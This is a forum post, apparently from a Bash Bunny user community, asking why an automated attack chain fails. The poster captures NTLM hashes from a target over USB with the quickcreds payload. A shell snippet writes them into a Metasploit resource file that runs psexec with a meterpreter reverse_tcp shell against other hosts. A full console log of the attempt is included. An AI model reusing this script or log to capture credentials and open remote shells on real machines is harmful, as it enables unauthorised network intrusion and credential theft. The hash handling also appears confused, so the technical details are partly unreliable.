Maestropastelero
Posted October 23, 2017

This is not a 100% Bash Bunny topic, but it is related and I think all the newbies like me could be interested.

I've used Metasploit on a Kali laptop with a post mimikatz module loaded and dumped NTLMv2 hashes fine. I took a superuser account hash and used exploit/windows/smb/psexec to access other computers on the same network.

Then I realized I can set up msf on my BB. Running v1.3 on my BB, I set up Metasploit following this guide: https://steemit.com/technology/@cronetos/install-metasploit-framework-on-the-bash-bunny-or-other-debian-related-distros

At first it melted my brain, as it didn't work and I am not super skilled in these matters, but after some gem uninstalls/installs/downgrades I finally made it work.

Then I used the quickcreds payload to get the hashes through the USB, and when that is done, I build an RC file that is passed to msfconsole -r. So far so good. Metasploit takes about 1 minute to load, but it works.

The problem is that when it tries to exploit, I always get Login Error: execution expired

The main question is: are the hashes from hashdump somehow different from the hashes that quickcreds provides? (I hope that doesn't sound too newbie.) Or does anyone see anything wrong with what I am doing here?

This is the log I got from Metasploit:

=[ metasploit v4.15.7-dev-70a82b5 ]
+ -- --=[ 1674 exploits - 960 auxiliary - 295 post ]
+ -- --=[ 489 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing /root/udisk/loot/quickcreds/LAPTOP1/conf.txt for ERB directives.
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> use exploit/windows/smb/psexec
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LHOST 172.16.64.1
LHOST => 172.16.64.1
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LPORT 443
LPORT => 443
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set RHOST 172.16.64.10
RHOST => 172.16.64.10
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBUser myusername
SMBUser => myusername
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBPass df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB
SMBPass => df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBDomain OFFICEDOMAIN
SMBDomain => OFFICEDOMAIN
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> exploit -j
[*] Exploit running as background job.
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> sleep 20
[*] Started reverse TCP handler on 172.16.64.1:443
[*] 172.16.64.10:445 - Connecting to the server...
[*] 172.16.64.10:445 - Authenticating to 172.16.64.10:445|OFFICEDOMAIN as user 'myusername'...
[-] 172.16.64.10:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired

---------------------------------------------------------------------------------------------------

This is what I added to the payload to test it (ugly code, it is just a test):

echo "use exploit/windows/smb/psexec" > $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set payload windows/meterpreter/reverse_tcp" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set LHOST 172.16.64.1" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set LPORT 443" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set RHOST ${TARGET_IP}" >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBUser "$1}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBPass "$4":"$5}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBDomain "$3}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "exploit -j" >> $LOOTDIR/$HOST-$COUNT/conf.txt
export HOME=/root
source /etc/profile.d/rvm.sh
cd /root/metasploit-framework/
./msfconsole -r $LOOTDIR/$HOST-$COUNT/conf.txt &>> /root/msf.log